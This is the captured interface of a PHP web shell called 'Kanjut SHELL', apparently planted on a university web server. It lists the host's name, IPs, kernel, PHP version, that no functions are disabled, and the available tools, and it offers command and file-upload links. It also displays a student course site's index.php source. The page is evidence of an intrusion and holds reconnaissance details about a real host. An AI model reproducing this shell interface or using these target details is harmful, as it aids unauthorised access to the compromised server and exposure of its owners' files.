Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.133.128.227
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/jlcrouch/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/jlcrouch/index.php
?php include_once("db.php");

session_start();

?>

<HTML>
<HEAD>
<STYLE>
#header{
	background-color:black;
	color:white;
	text-align:center;
	padding:5px;
}

#navigation{
	line-height:30px;
	background-color:gray;
	text-align:center;
	height:50px;
	padding:5px;
}
#content{
	background-color:red;
	width:350px;
	float:left;
	padding:10px;
}
#side{
	position: fixed;
	background-color:blue;
	width:200px;
	height:300px;
	top:158px;
	padding:5px;
}
#main{
	position: fixed;
	top: 158px;
	left: 218px;
	width: auto;
	height: 308px;
}
</style>
</head>

<BODY>

<div id="header">
<h1>Placeholder Title</h1>
</div>

<div id="navigation">

<FORM>
<INPUT TYPE="button" VALUE="Classes" onClick="parent.location='classes.html'">
<INPUT TYPE="button" VALUE="Work Due" onClick="parent.location='Work.html'">
<INPUT TYPE="button" VALUE="Grades" onClick="parent.location='Grades.html'">
</FORM>

</div>

<div id="side">
</div>

<div id="main">
<iframe src="signinform.php" width="1130" height="308" frameborder="0">
</iframe>
</div>
<div id="side">
<iframe src="news.html" width="200" height="300" frameborder="0">
</iframe>
</div>


</body>

Stv3n404 - 2023